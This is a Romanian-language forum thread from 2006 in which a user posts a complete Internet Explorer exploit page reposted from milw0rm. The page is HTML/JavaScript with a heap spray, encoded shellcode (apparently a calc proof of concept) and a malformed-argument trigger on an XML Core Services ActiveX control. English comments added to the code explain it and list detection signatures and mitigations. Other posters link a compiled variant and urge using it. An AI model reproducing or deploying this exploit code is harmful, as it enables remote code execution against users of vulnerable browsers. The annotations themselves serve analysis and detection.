escalation666 Posted November 10, 2006
#se pare ca ti-au raspuns astia la intrebari
<html xmlns="http://www.w3.org/1999/xhtml"><body><script>
// Script 1: sets the two inputs used by the next script.
// heapSprayToAddress is the memory address the later size arithmetic is based on.
 var heapSprayToAddress = 0x05050505;
// payLoadCode is binary data packed into a JavaScript string: each %uXXXX escape
// becomes one 16-bit code unit. The trailing units decode to the ASCII text "calc",
// which suggests a proof-of-concept payload (not verified here).
// Detection: a long unescape("%uXXXX...") literal is a common static indicator
// of a browser-exploit page and is worth matching in web-content scanning.
 var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");</script><script>
// Script 2: builds a large filler string and combines it with the payload.
// Sizes are in bytes; string lengths are in 16-bit units, hence the *2 and /2.
 var heapBlockSize = 0x400000;
 var payLoadSize = payLoadCode.length * 2;
// 0x3b is not explained on the page; presumably per-allocation overhead. TODO confirm.
 var spraySlideSize = heapBlockSize - (payLoadSize+0x3b);
// 0x90 is the x86 NOP opcode, so the filler is a run of no-op bytes.
// Detection: %u9090 next to megabyte-sized string building is a classic
// heap-spray signature.
 var spraySlide = unescape("%u9090%u9090");
 spraySlide = getSpraySlide(spraySlide,spraySlideSize);
// heapBlocks, memory and i are assigned without var, so they become implicit globals.
 heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
 memory = new Array();
// As written, each iteration assigns the filler+payload string to `memory`.
 for (i=0;i<heapBlocks;i++) { memory = spraySlide + payLoadCode; }
// Doubles the string until it holds at least spraySlideSize bytes, then truncates
// it to exactly spraySlideSize/2 characters and returns it.
 function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; }</script><object id=target classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5" ></object><script>
// Script 3: drives the ActiveX object created by the <object> tag above through its
// .object property. A later post in this thread titles the exploit
// "MS Internet Explorer 6/7 (XML Core Services)", so the CLSID presumably
// identifies an XML Core Services HTTP-request control (verify against the
// vendor advisory).
// Mitigation: apply the vendor's XML Core Services update, or block instantiation
// of this CLSID in the browser. The CLSID string is a precise indicator when
// hunting for pages of this kind.
var obj = null;
obj = document.getElementById('target').object;
// open() is first called with five Array arguments; any exception is discarded.
try {obj.open(new Array(),new Array(),new Array(),new Array(),new Array());} catch(e) {};
// open() is then called with five plain Objects, this time with no try/catch.
obj.open(new Object(),new Object(),new Object(),new Object(), new Object());
// setRequestHeader() is called with an Object as the header name and a
// non-standard value, twelve times in total. Presumably these malformed
// arguments trigger the flaw; the page does not explain the mechanism.
 obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x1234567b);
obj.setRequestHeader(new Object(),0x1234567b);
obj.setRequestHeader(new Object(),0x1234567b);
obj.setRequestHeader(new Object(),0x1234567b);
obj.setRequestHeader(new Object(),0x1234567b);
obj.setRequestHeader(new Object(),0x1234567b);
obj.setRequestHeader(new Object(),0x1234567b);
obj.setRequestHeader(new Object(),0x1234567b);
obj.setRequestHeader(new Object(),0x1234567b);
obj.setRequestHeader(new Object(),0x1234567b);
obj.setRequestHeader(new Object(),0x1234567b);</script></body></html>
# milw0rm.com [2006-11-10]
HexString Posted November 10, 2006
imi spuneti pls si mie ce face, ca nu m-am prins
RedJoker Posted November 11, 2006
foloseste-l pe asta ca e mai logic: http://milw0rm.com/exploits/2753
HexString Posted November 11, 2006
Dar ce face?
virusz Posted November 11, 2006
Face ce face si al lui escalation666, doar ca e scris in alt limbaj, il compilezi si il folosesti!
- MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit
Works on Windows XP versions including SP2 and 2K
- bafta!
HexString Posted November 11, 2006
mda, oricum las-o balta... am zis ca eu nu stiu ce face asta :) nici pe primul, nici pe al doilea